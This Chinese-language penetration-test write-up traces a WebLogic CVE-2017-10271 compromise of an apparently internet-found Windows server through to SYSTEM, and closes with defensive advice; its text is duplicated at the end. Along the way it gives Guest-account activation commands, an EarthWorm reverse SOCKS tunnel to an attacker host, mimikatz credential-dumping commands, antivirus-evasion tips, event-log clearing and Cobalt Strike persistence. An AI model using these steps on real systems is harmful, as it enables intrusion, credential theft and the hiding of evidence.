记一次从weblogic到拿到system权限
字数 1636 2025-08-12 12:08:15

WebLogic反序列化漏洞利用与权限提升实战教学

0x00 前言

本教学文档详细记录了一次从WebLogic反序列化漏洞(CVE-2017-10271)利用到最终获取系统SYSTEM权限的完整过程。攻击环境为Windows Server 2008系统,包含绕过杀毒软件、建立隧道、横向移动和权限提升等关键环节。

0x01 漏洞发现与初步利用

1. 目标识别

  • 使用ZoomEye等网络空间搜索引擎寻找暴露在互联网上的WebLogic服务
  • 通过版本识别和简单探测判断是否存在CVE-2017-10271反序列化漏洞

2. 漏洞利用

  • 确认存在漏洞后,直接上传冰蝎(Behinder)的WebShell
  • 冰蝎是一个基于Java的动态加密WebShell管理工具,具有良好的隐蔽性

3. 信息收集

通过WebShell收集到以下关键信息:

  • 服务器环境:独立IP、无内网环境
  • 操作系统:Windows Server 2008
  • 当前权限:administrator级别
  • 安全软件:Windows Defender和Ahnlab杀毒软件
  • 网络状况:3389端口开放但不出网

0x02 横向移动与远程桌面控制

1. 账号激活与修改

  • 激活Guest用户(如未激活):net user guest /active:yes
  • 修改Guest用户密码:net user guest [新密码]

2. 建立隧道连接

由于3389端口不出网,使用EarthWorm(EW)工具建立Socks5隧道:

  1. 在攻击机上运行:ew -s rcsocks -l 1080 -e 8888
  2. 在目标服务器上运行:ew -s rssocks -d [攻击机IP] -e 8888
  3. 配置本地代理通过Socks5(127.0.0.1:1080)连接目标3389端口

3. 远程桌面连接

使用激活的Guest账号通过隧道连接远程桌面:
mstsc /v:127.0.0.1:3389 /proxy:socks5://127.0.0.1:1080

0x03 权限提升与后渗透

1. 获取管理员凭据

在远程桌面中使用Mimikatz获取administrator密码:

privilege::debug
sekurlsa::logonpasswords

注意:Windows Defender和Ahnlab会检测Mimikatz,需做免杀处理

2. 免杀技巧

  • 使用白名单程序加载Mimikatz(如使用合法签名程序的内存加载)
  • 修改Mimikatz特征码或使用内存注入方式绕过检测
  • 由于已有远程桌面,可直接关闭杀毒软件实时防护

3. 权限提升至SYSTEM

使用"烂土豆"(Rotten Potato)提权:

  1. 上传JuicyPotato或PrintSpoofer等提权工具
  2. 执行提权命令获取SYSTEM权限令牌
  3. 创建SYSTEM权限的进程或服务

4. 持久化控制

  1. 上传Cobalt Strike的Beacon到SYSTEM权限进程
  2. 创建计划任务或服务实现持久化
  3. 清理日志:使用wevtutil cl命令清除相关事件日志

0x04 防御建议

  1. WebLogic防护

    • 及时安装CVE-2017-10271补丁
    • 限制WebLogic管理端口的外网访问
    • 启用WebLogic的安全审计功能

  2. 系统加固

    • 禁用Guest账户或设置强密码
    • 限制远程桌面访问IP范围
    • 定期检查异常账户和进程

  3. 安全监控

    • 监控异常进程创建(如Mimikatz相关行为)
    • 关注特权账户的异常登录行为
    • 定期审计系统日志和安全日志

  4. 网络防护

    • 限制出站Socks代理连接
    • 监控异常隧道流量
    • 实施网络分段,限制横向移动

0x05 总结

本次渗透测试展示了从Web应用漏洞到系统完全控制的完整攻击链,关键点包括:

  1. 准确识别和利用WebLogic反序列化漏洞
  2. 通过隧道技术绕过网络限制
  3. 使用Mimikatz获取凭据的技巧
  4. 多种提权方法的灵活应用
  5. 针对杀毒软件的免杀处理

防御方应重视每一环节的防护,建立纵深防御体系,才能有效抵御此类攻击。

WebLogic反序列化漏洞利用与权限提升实战教学 0x00 前言 本教学文档详细记录了一次从WebLogic反序列化漏洞(CVE-2017-10271)利用到最终获取系统SYSTEM权限的完整过程。攻击环境为Windows Server 2008系统,包含绕过杀毒软件、建立隧道、横向移动和权限提升等关键环节。 0x01 漏洞发现与初步利用 1. 目标识别 使用ZoomEye等网络空间搜索引擎寻找暴露在互联网上的WebLogic服务 通过版本识别和简单探测判断是否存在CVE-2017-10271反序列化漏洞 2. 漏洞利用 确认存在漏洞后,直接上传冰蝎(Behinder)的WebShell 冰蝎是一个基于Java的动态加密WebShell管理工具,具有良好的隐蔽性 3. 信息收集 通过WebShell收集到以下关键信息: 服务器环境:独立IP、无内网环境 操作系统:Windows Server 2008 当前权限:administrator级别 安全软件:Windows Defender和Ahnlab杀毒软件 网络状况:3389端口开放但不出网 0x02 横向移动与远程桌面控制 1. 账号激活与修改 激活Guest用户(如未激活): net user guest /active:yes 修改Guest用户密码: net user guest [新密码] 2. 建立隧道连接 由于3389端口不出网,使用EarthWorm(EW)工具建立Socks5隧道: 在攻击机上运行: ew -s rcsocks -l 1080 -e 8888 在目标服务器上运行: ew -s rssocks -d [攻击机IP] -e 8888 配置本地代理通过Socks5(127.0.0.1:1080)连接目标3389端口 3. 远程桌面连接 使用激活的Guest账号通过隧道连接远程桌面: mstsc /v:127.0.0.1:3389 /proxy:socks5://127.0.0.1:1080 0x03 权限提升与后渗透 1. 获取管理员凭据 在远程桌面中使用Mimikatz获取administrator密码: 注意:Windows Defender和Ahnlab会检测Mimikatz,需做免杀处理 2. 免杀技巧 使用白名单程序加载Mimikatz(如使用合法签名程序的内存加载) 修改Mimikatz特征码或使用内存注入方式绕过检测 由于已有远程桌面,可直接关闭杀毒软件实时防护 3. 权限提升至SYSTEM 使用"烂土豆"(Rotten Potato)提权: 上传JuicyPotato或PrintSpoofer等提权工具 执行提权命令获取SYSTEM权限令牌 创建SYSTEM权限的进程或服务 4. 持久化控制 上传Cobalt Strike的Beacon到SYSTEM权限进程 创建计划任务或服务实现持久化 清理日志:使用 wevtutil cl 命令清除相关事件日志 0x04 防御建议 WebLogic防护 : 及时安装CVE-2017-10271补丁 限制WebLogic管理端口的外网访问 启用WebLogic的安全审计功能 系统加固 : 禁用Guest账户或设置强密码 限制远程桌面访问IP范围 定期检查异常账户和进程 安全监控 : 监控异常进程创建(如Mimikatz相关行为) 关注特权账户的异常登录行为 定期审计系统日志和安全日志 网络防护 : 限制出站Socks代理连接 监控异常隧道流量 实施网络分段,限制横向移动 0x05 总结 本次渗透测试展示了从Web应用漏洞到系统完全控制的完整攻击链,关键点包括: 准确识别和利用WebLogic反序列化漏洞 通过隧道技术绕过网络限制 使用Mimikatz获取凭据的技巧 多种提权方法的灵活应用 针对杀毒软件的免杀处理 防御方应重视每一环节的防护,建立纵深防御体系,才能有效抵御此类攻击。